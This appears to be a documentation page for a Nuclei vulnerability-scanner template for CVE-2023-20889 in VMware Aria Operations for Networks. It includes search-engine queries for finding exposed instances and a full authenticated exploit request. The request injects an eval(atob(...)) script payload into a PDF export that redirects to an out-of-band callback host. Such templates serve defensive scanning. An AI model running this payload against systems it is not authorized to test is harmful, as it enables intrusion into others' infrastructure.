VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability
ID: CVE-2023-20889
Severity: high
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve2023,cve,vmware,aria,disclosure,authenticated,rce,oast,intrusive
Description
Section titled “Description”Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure.
YAML Source
Section titled “YAML Source”id: CVE-2023-20889
info: name: VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability author: iamnoooob,rootxharsh,pdresearch severity: high description: | Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure. impact: | Successful exploitation of this vulnerability can result in unauthorized access to sensitive information. remediation: | Apply the latest security patches provided by VMware to mitigate this vulnerability. reference: - https://www.zerodayinitiative.com/advisories/ZDI-23-842/ - https://www.vmware.com/security/advisories/VMSA-2023-0012.html - https://nvd.nist.gov/vuln/detail/CVE-2023-20889 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-20889 cwe-id: CWE-77 epss-score: 0.37918 epss-percentile: 0.9721 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: vmware product: vrealize_network_insight shodan-query: - title:"VMware Aria Operations" - http.title:"vmware vrealize network insight" - http.title:"vmware aria operations" fofa-query: - title="vmware vrealize network insight" - title="vmware aria operations" google-query: - intitle:"vmware aria operations" - intitle:"vmware vrealize network insight" tags: cve2023,cve,vmware,aria,disclosure,authenticated,rce,oast,intrusivevariables: payload: location='http://{{interactsh-url}}'
http: - raw: - | POST /api/auth/login HTTP/2 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 X-Vrni-Csrf-Token: null
{"username":"{{username}}","password":"{{password}}","domain":"localdomain"} - | POST /api/pdfexport HTTP/2 Host: {{Hostname}} X-Vrni-Csrf-Token: {{csrf}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh
------WebKitFormBoundaryFkpSYDWZ5w9YNjmh Content-Disposition: form-data; name="{{randstr}}"
<!DOCTYPE HTML> <html> <head> <title>Test</title> </head> <body> <p data-vrni='vRealize'><style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationstart="eval(atob('{{base64(payload)}}'))"></xss></p> </body> </html> ------WebKitFormBoundaryFkpSYDWZ5w9YNjmh--
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - dns - http
- type: word part: header_2 words: - application/octet-stream
- type: status status: - 200
extractors: - type: regex name: csrf group: 1 regex: - csrfToken":"([a-z0-9A-Z/+=]+)" internal: true part: body# digest: 4a0a00473045022031bd10daab9f8b59de094f9790d829029d62d119136117e7acb3aa3360658e7d022100b7f7a574af117e63129ef88520d3bf2bc67ece24104b0796ccb7fd41c89eaae7:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-20889.yaml"